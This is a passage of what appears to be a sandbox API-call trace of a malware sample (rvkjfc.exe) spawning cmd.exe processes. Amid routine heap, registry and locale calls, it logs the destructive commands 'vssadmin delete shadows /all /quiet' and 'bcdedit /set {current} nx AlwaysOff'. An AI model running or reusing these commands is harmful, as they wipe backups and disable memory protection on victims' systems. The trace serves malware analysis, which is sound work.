-18 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.099] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0045.100] GetProcessHeap () returned 0x2d0000 [0045.100] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4620 | out: hHeap=0x2d0000) returned 1 [0045.100] GetProcessHeap () returned 0x2d0000 [0045.100] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e8370 [0045.100] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.101] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1eee70*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eee20 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x1eee20*(hProcess=0x54, hThread=0x50, dwProcessId=0x7a0, dwThreadId=0x540)) returned 1 [0045.281] CloseHandle (hObject=0x50) returned 1 [0045.281] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.281] GetProcessHeap () returned 0x2d0000 [0045.282] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed730 | out: hHeap=0x2d0000) returned 1 [0045.282] GetEnvironmentStringsW () returned 0x2ecc40* [0045.282] GetProcessHeap () returned 0x2d0000 [0045.282] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2ed730 [0045.282] FreeEnvironmentStringsW (penv=0x2ecc40) returned 1 [0045.282] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0105.054] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1eed68 | out: lpExitCode=0x1eed68*=0x0) returned 1 [0105.054] CloseHandle (hObject=0x54) returned 1 [0105.054] _vsnwprintf (in: _Buffer=0x1eefd8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eed78 | out: _Buffer="00000000") returned 8 [0105.054] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0105.054] GetProcessHeap () returned 0x2d0000 [0105.055] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed730 | out: hHeap=0x2d0000) returned 1 [0105.055] GetEnvironmentStringsW () returned 0x2ecc40* [0105.055] GetProcessHeap () returned 0x2d0000 [0105.055] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eed40 [0105.055] FreeEnvironmentStringsW (penv=0x2ecc40) returned 1 [0105.055] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0105.055] GetProcessHeap () returned 0x2d0000 [0105.055] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eed40 | out: hHeap=0x2d0000) returned 1 [0105.055] GetEnvironmentStringsW () returned 0x2ecc40* [0105.055] GetProcessHeap () returned 0x2d0000 [0105.055] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eed40 [0105.055] FreeEnvironmentStringsW (penv=0x2ecc40) returned 1 [0105.055] GetProcessHeap () returned 0x2d0000 [0105.055] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8370 | out: hHeap=0x2d0000) returned 1 [0105.055] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eee38 | out: lpAttributeList=0x1eee38) [0105.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.055] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.055] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0105.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.056] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0105.056] SetConsoleInputExeNameW () returned 0x1 [0105.056] GetConsoleOutputCP () returned 0x1b5 [0105.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0105.056] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.056] exit (_Code=0) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3399b000" os_pid = "0x43c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6dc" cmd_line = "/C bcdedit.exe /set {current} nx AlwaysOff" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0x670 [0044.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb30 | out: lpSystemTimeAsFileTime=0x18fb30*(dwLowDateTime=0x27058290, dwHighDateTime=0x1d5f247)) [0044.898] GetCurrentProcessId () returned 0x43c [0044.898] GetCurrentThreadId () returned 0x670 [0044.898] GetTickCount () returned 0x1145cff [0044.898] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb38 | out: lpPerformanceCount=0x18fb38*=16576036256) returned 1 [0044.900] GetModuleHandleW (lpModuleName=0x0) returned 0x49d20000 [0044.900] __set_app_type (_Type=0x1) [0044.900] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d47810) returned 0x0 [0044.900] __getmainargs (in: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610, _DoWildCard=0, _StartInfo=0x49d4e0f4 | out: _Argc=0x49d6a608, _Argv=0x49d6a618, _Env=0x49d6a610) returned 0 [0044.900] GetCurrentThreadId () returned 0x670 [0044.900] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x670) returned 0x3c [0044.900] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0044.900] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0044.900] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0044.901] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.901] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fac8 | out: phkResult=0x18fac8*=0x0) returned 0x2 [0044.901] VirtualQuery (in: lpAddress=0x18fab0, lpBuffer=0x18fa30, dwLength=0x30 | out: lpBuffer=0x18fa30*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.901] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fa30, dwLength=0x30 | out: lpBuffer=0x18fa30*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.901] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fa30, dwLength=0x30 | out: lpBuffer=0x18fa30*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.901] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18fa30, dwLength=0x30 | out: lpBuffer=0x18fa30*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.901] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fa30, dwLength=0x30 | out: lpBuffer=0x18fa30*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0044.901] GetConsoleOutputCP () returned 0x1b5 [0044.901] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0044.902] SetConsoleCtrlHandler (HandlerRoutine=0x49d43184, Add=1) returned 1 [0044.902] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.902] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0045.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0045.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0045.017] _get_osfhandle (_FileHandle=0) returned 0x3 [0045.017] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0045.017] GetEnvironmentStringsW () returned 0x29aa50* [0045.017] GetProcessHeap () returned 0x280000 [0045.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x29b4e0 [0045.017] FreeEnvironmentStringsW (penv=0x29aa50) returned 1 [0045.017] GetProcessHeap () returned 0x280000 [0045.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8) returned 0x29bf70 [0045.017] GetEnvironmentStringsW () returned 0x29aa50* [0045.018] GetProcessHeap () returned 0x280000 [0045.018] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x29bf90 [0045.020] FreeEnvironmentStringsW (penv=0x29aa50) returned 1 [0045.021] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e988 | out: phkResult=0x18e988*=0x44) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x0, lpData=0x18e9a0*=0x18, lpcbData=0x18e984*=0x1000) returned 0x2 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x1, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x0, lpData=0x18e9a0*=0x1, lpcbData=0x18e984*=0x1000) returned 0x2 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x0, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x40, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x40, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x0, lpData=0x18e9a0*=0x40, lpcbData=0x18e984*=0x1000) returned 0x2 [0045.021] RegCloseKey (hKey=0x44) returned 0x0 [0045.021] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e988 | out: phkResult=0x18e988*=0x44) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x0, lpData=0x18e9a0*=0x40, lpcbData=0x18e984*=0x1000) returned 0x2 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x1, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x0, lpData=0x18e9a0*=0x1, lpcbData=0x18e984*=0x1000) returned 0x2 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x0, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x9, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x4, lpData=0x18e9a0*=0x9, lpcbData=0x18e984*=0x4) returned 0x0 [0045.021] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e980, lpData=0x18e9a0, lpcbData=0x18e984*=0x1000 | out: lpType=0x18e980*=0x0, lpData=0x18e9a0*=0x9, lpcbData=0x18e984*=0x1000) returned 0x2 [0045.021] RegCloseKey (hKey=0x44) returned 0x0 [0045.021] time (in: timer=0x0 | out: timer=0x0) returned 0x5e5fdfec [0045.021] srand (_Seed=0x5e5fdfec) [0045.021] GetCommandLineW () returned="/C bcdedit.exe /set {current} nx AlwaysOff" [0045.021] GetCommandLineW () returned="/C bcdedit.exe /set {current} nx AlwaysOff" [0045.022] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0045.022] GetProcessHeap () returned 0x280000 [0045.022] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29ca20 [0045.022] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29ca30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0045.022] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0045.022] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.022] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0045.022] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0045.022] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0045.022] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0045.022] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0045.022] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0045.022] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0045.022] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0045.022] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0045.022] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0045.022] GetProcessHeap () returned 0x280000 [0045.022] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b4e0 | out: hHeap=0x280000) returned 1 [0045.022] GetEnvironmentStringsW () returned 0x29aa50* [0045.022] GetProcessHeap () returned 0x280000 [0045.022] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa94) returned 0x29cc40 [0045.023] FreeEnvironmentStringsW (penv=0x29aa50) returned 1 [0045.023] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.023] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0045.023] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0045.023] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0045.023] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0045.023] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0045.023] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0045.023] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0045.023] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0045.023] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0045.023] GetProcessHeap () returned 0x280000 [0045.023] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x5c) returned 0x298300 [0045.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f790 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0045.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f790, lpFilePart=0x18f770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f770*="Desktop") returned 0x25 [0045.023] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0045.023] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f4a0 | out: lpFindFileData=0x18f4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2999a0 [0045.023] FindClose (in: hFindFile=0x2999a0 | out: hFindFile=0x2999a0) returned 1 [0045.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f4a0 | out: lpFindFileData=0x18f4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2999a0 [0045.023] FindClose (in: hFindFile=0x2999a0 | out: hFindFile=0x2999a0) returned 1 [0045.023] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0045.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f4a0 | out: lpFindFileData=0x18f4a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x183bc620, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x183bc620, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2999a0 [0045.024] FindClose (in: hFindFile=0x2999a0 | out: hFindFile=0x2999a0) returned 1 [0045.024] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0045.024] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0045.024] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0045.024] GetProcessHeap () returned 0x280000 [0045.024] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cc40 | out: hHeap=0x280000) returned 1 [0045.024] GetEnvironmentStringsW () returned 0x29cc40* [0045.024] GetProcessHeap () returned 0x280000 [0045.024] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xae8) returned 0x29d730 [0045.024] FreeEnvironmentStringsW (penv=0x29cc40) returned 1 [0045.024] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0045.024] GetProcessHeap () returned 0x280000 [0045.024] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x298300 | out: hHeap=0x280000) returned 1 [0045.024] GetProcessHeap () returned 0x280000 [0045.024] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4016) returned 0x29e220 [0045.024] GetProcessHeap () returned 0x280000 [0045.024] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x64) returned 0x298300 [0045.024] GetProcessHeap () returned 0x280000 [0045.025] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29e220 | out: hHeap=0x280000) returned 1 [0045.025] GetConsoleOutputCP () returned 0x1b5 [0045.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0045.025] GetUserDefaultLCID () returned 0x409 [0045.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d57b50, cchData=8 | out: lpLCData=":") returned 2 [0045.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f8a0, cchData=128 | out: lpLCData="0") returned 2 [0045.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f8a0, cchData=128 | out: lpLCData="0") returned 2 [0045.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f8a0, cchData=128 | out: lpLCData="1") returned 2 [0045.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49d6a740, cchData=8 | out: lpLCData="/") returned 2 [0045.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49d6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49d6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49d6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49d6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49d6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49d6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49d6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d57b40, cchData=8 | out: lpLCData=".") returned 2 [0045.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49d6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0045.028] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0045.029] GetProcessHeap () returned 0x280000 [0045.029] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20c) returned 0x29b5b0 [0045.029] GetConsoleTitleW (in: lpConsoleTitle=0x29b5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.031] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0045.031] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0045.031] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0045.031] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0045.032] GetProcessHeap () returned 0x280000 [0045.032] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4012) returned 0x29e220 [0045.032] GetProcessHeap () returned 0x280000 [0045.032] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29e220 | out: hHeap=0x280000) returned 1 [0045.032] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0045.032] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0045.032] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0045.032] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0045.032] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0045.032] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0045.032] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0045.032] GetProcessHeap () returned 0x280000 [0045.033] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0) returned 0x29b7d0 [0045.033] GetProcessHeap () returned 0x280000 [0045.033] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x28) returned 0x2945f0 [0045.033] GetProcessHeap () returned 0x280000 [0045.033] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4a) returned 0x2999a0 [0045.034] GetConsoleTitleW (in: lpConsoleTitle=0x18f7b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.038] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bcdedit.exe")) returned 0xffffffff [0045.038] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0045.038] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0045.038] _wcsicmp (_String1="bcdedit", _String2="DEL") returned 